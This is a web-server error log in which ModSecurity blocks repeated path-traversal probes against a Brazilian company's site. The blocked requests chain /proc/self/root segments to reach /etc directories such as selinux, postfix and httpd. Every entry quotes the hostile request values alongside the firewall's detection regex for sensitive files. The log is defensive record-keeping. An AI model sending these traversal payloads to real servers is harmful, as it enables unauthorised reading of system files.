[Fri Mar 20 04:00:33.581676 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:45434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwkfqxLDW4GITHUkS0fgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:35.140128 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:45444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwk7ninkcc-iUj5Aov_wAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:36.422898 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:45460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwlDJ3M9BSuKP7CAbi8QAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:37.683562 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:45476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwlbninkcc-iUj5AowBAAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:40.212268 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:45484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwmLninkcc-iUj5AowDgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:42.670859 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:44942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwmbninkcc-iUj5AowEQAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:43.955085 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.243.128:44944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwm11pVZ5mVmJwsFMD3gAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:45.243570 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:44960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwneoXxyEfFpUF8f9WYQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:49.232824 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwoda6ubjKNq_cu4ahcAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:50.587006 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:46594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwovHIg5MgXLBnicPOVAAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:54.103386 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:46602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwpgF0L0L-SsrnPo462gAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:00:55.520378 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:46614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwp_qxLDW4GITHUkS0hgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:27.131056 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:34594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwxxCii7xarUs8iHY3YgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:31.119344 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:57044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwyzJ3M9BSuKP7CAbjMwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:41.256472 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:57058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw1fqxLDW4GITHUkS0rQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:52.164734 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:54262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw4Na6ubjKNq_cu4ahpQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:55.668579 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:33488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw4wF0L0L-SsrnPo47BQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:01:58.019171 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:33490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw5vXLqtnMIWvjpaJsEAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:01:59.375562 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:40112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw5wF0L0L-SsrnPo47CAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:00.688387 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.241.31:40124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw6Lninkcc-iUj5AowaQAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:03.864075 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:40134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw6-oXxyEfFpUF8f9WjgAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:06.463791 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:40138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzw7hCii7xarUs8iHY3dAAAAgM"], referer: 